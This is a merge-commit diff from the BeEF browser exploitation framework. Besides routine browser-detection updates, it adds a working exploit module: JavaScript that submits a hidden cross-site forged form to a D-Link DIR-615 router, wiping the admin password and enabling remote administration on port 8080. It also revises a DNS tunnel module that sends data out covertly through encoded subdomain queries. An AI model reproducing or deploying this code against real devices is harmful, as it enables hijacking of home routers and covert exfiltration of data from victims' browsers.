Merge remote branch 'upstream/master'

core/main/client/are.js

@@ -0,0 +1,11 @@
+
+beef.are = {
+  init:function(){
+   var Jools = require('jools');
+   this.ruleEngine = new Jools();
+  },
+  rules:[],
+  commands:[],
+  results:[]
+};
+beef.regCmp("beef.are");

core/main/client/browser.js

@@ -332,12 +332,20 @@ beef.browser = {
 		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==19)?true:false);
 	},
 
+	/**
+	 * Returns true if Chrome 20.
+	 * @example: beef.browser.isC20()
+	 */
+	isC20: function() {
+		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==20)?true:false);
+	},
+
 	/**
 	 * Returns true if Chrome.
 	 * @example: beef.browser.isC()
 	 */
 	isC: function() {
-		return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19();
+		return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19() || this.isC20();
 	},
 
 	/**
@@ -404,6 +412,7 @@ beef.browser = {
             C17:	this.isC17(),	// Chrome 17
 			C18:	this.isC18(),	// Chrome 18
 			C19:	this.isC19(),	// Chrome 19
+			C20:	this.isC20(),	// Chrome 20
 			C:	this.isC(), 	// Chrome any version
 
 			FF2:	this.isFF2(),	// Firefox 2
@@ -463,6 +472,7 @@ beef.browser = {
         if (this.isC17())	{ return '17' };	// Chrome 17
 		if (this.isC18())   { return '18' };    // Chrome 18
 		if (this.isC19())   { return '19' };    // Chrome 19
+		if (this.isC20())	{ return '20' };	// Chrome 20
 
 		if (this.isFF2())	{ return '2'  };	// Firefox 2
 		if (this.isFF3())	{ return '3'  };	// Firefox 3

core/main/client/init.js

@@ -66,6 +66,7 @@ function beef_init() {
             beef.net.browser_details();
             beef.updater.execute_commands();
             beef.logger.start();
+            beef.are.init();
 
         }
         else {
@@ -73,6 +74,7 @@ function beef_init() {
             beef.updater.execute_commands();
             beef.updater.check();
             beef.logger.start();
+            beef.are.init();
         }
 
     }

core/main/handlers/modules/beefjs.rb

@@ -32,9 +32,12 @@ module Modules
       # @note we load websocket library only if ws server is enabled in config.yalm
       # check in init.js
       if config.get("beef.http.websocket.enable")
-        js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js)
+
+        js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js are.js)
       else
-        js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js)
+        js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js)
+
+
       end
 
       # @note construct the beefjs string from file(s)

extensions/evasion/config.yaml

@@ -25,4 +25,4 @@ beef:
               beef: "beef"
               Beef: "Beef"
               evercookie: "evercookie"
-            chain: ["scramble","minify","base_64"]
+            chain: ["scramble", "minify", "base_64"]

modules/exploits/router/dlink_dir_615_wipe_passwd/command.js

@@ -0,0 +1,39 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+  var gateway = '<%= @base %>'; 
+
+  var dir615_iframe = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
+      [{'type':'hidden', 'name':'ACTION_POST', 'value':'1'} ,
+       {'type':'hidden', 'name':'apply', 'value':'Save Settings'},
+       {'type':'hidden', 'name':'admin_name', 'value':'admin'},
+       {'type':'hidden', 'name':'admin_password1', 'value':''},
+       {'type':'hidden', 'name':'admin_password2', 'value':''},
+       {'type':'hidden', 'name':'rt_enable', 'value':'on'},
+       {'type':'hidden', 'name':'rt_enable_h', 'value':'1'},
+       {'type':'hidden', 'name':'rt_ipaddr', 'value':'0.0.0.0'},
+       {'type':'hidden', 'name':'rt_port', 'value':'8080'}
+      ]);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(dir615_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/router/dlink_dir_615_wipe_passwd/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        dlink_dir_615_wipe_passwd:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "D-Link DIR-615 Password Wipe"
+            description: "Attempts to wipe the password of the admin user on a D-Link DIR-615 router. Enable also remote administration on 0.0.0.0:8080"
+            authors: ["antisnatchor", "n0x00"]
+            target:
+                working: ["ALL"]

modules/exploits/router/dlink_dir_615_wipe_passwd/module.rb

@@ -0,0 +1,28 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Dlink_dir_615_wipe_passwd < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/ipec/dns_tunnel/command.js

@@ -14,16 +14,16 @@
 //   limitations under the License.
 //
 /*
-Poor man's omni-directional DNS tunnel in JavaScript.
+Poor man's unidirectional DNS tunnel in JavaScript.
 The largely-untested, highly experimental first draft.
 
 How it works:
 
 A remote domain with a DNS server configured to accept wildcard subdomains is required to receive the data. BeEF does not support this feature so you're on your own when it comes to decoding the information.
 
-A domain and message are taken as input. The message is XOR'd, url encoded, the "%" are replaced with "." and the message is split into segments of 230 bytes. The queries are sent in sequence however there are plans to randomize the order.
+A domain and message are taken as input. The message is XOR'd, url encoded, the "%" are replaced with "." and the message is split into segments of 230 bytes. The segments are sent in sequence however there are plans to randomize the order.
 
-To allow the original message to be pieced back together each message is allocated an id and each DNS query is given a sequence number. The final domain name used in the query is structured as follows:
+To allow the original message to be pieced back together each message is allocated an id and each DNS query is given a sequence number. The final domain name used in the DNS query is structured as follows:
 
 MESSAGE_ID.SEGMENT_SEQUENCE_NUMBER.TOTAL_SEGMENTS.XOR_KEY.MESSAGE_SEGMENT.REMOTE_DOMAIN
 
@@ -37,15 +37,10 @@ o Domain names are limited to 255 characters in length (including dots)
 o The name space has a maximum depth of 127 levels (ie, maximum 127 subdomains)
 o Subdomains are limited to 63 characters in length (including the trailing dot)
 
-Each query is sent by appending an image to the DOM containing the query as the image source. The images are later destroyed.
-
-Features:
-o Does not use DNS pre-fetching - The downside is that the requests will take a while to timeout unless the DNS server is configured to reply with NXDOMAIN (ie, blackholed) for all requests.
-o Encryption - Uses very weak "encryption" (XOR) and the key is transferred with the request.
-o Randomization - Each segment is given a sequence id. TODO: Send segments in a random order.
+Each segment is sent by appending an image to the DOM containing the query as the image source. The images are later destroyed.
 
 Caveats:
-o Omni-directional - Data can only be sent one way.
+o Unidirectional - Data can only be sent one way.
 o Message size - Limited to messages less than 64KB in length.
 o Limited by JavaScript strings. Byte code needs to be converted to a compatible string before it can be sent. There's also lots of wasted space. Converting to hex would be much cleaner and would save a few bytes for each query.
 o Throttling - There is no throttling. The browser may only initiate x amount of simultaneous connections. The requests should be throttled to avoid hitting the cap. TODO: Introduce a wait delay between each request to partially account for this.
@@ -64,7 +59,7 @@ beef.execute(function() {
 	var domain  = "<%= @domain %>";
 	var message = "<%= @message %>";
 
-	beef.net.dns.send(msgId, message, domain, wait, function(num) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'dns_requests='+num) } );
+	beef.net.dns.send(msgId, message, domain, wait, function(num) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'dns_requests='+num+' requests sent') } );
 
 });
 

modules/ipec/dns_tunnel/config.yaml

@@ -19,7 +19,7 @@ beef:
             enable: true
             category: "IPEC"
             name: "DNS Tunnel"
-            description: "Sends data over DNS to a server which accepts wildcard subdomains."
+            description: "This module sends data one way over DNS.<br/><br/>A domain and message are taken as input. The message is XOR'd, url encoded, the '%' are replaced with '.' and the message is split into segments of 230 bytes. The segments are sent in sequence along with the sequence number and XOR key.<br/><br/>Note: A remote domain with a DNS server configured to accept wildcard subdomains is required to receive the data. BeEF does not support this feature so you're on your own when it comes to decoding the information."
             authors: ["bcoles"]
             target:
                 working: "All"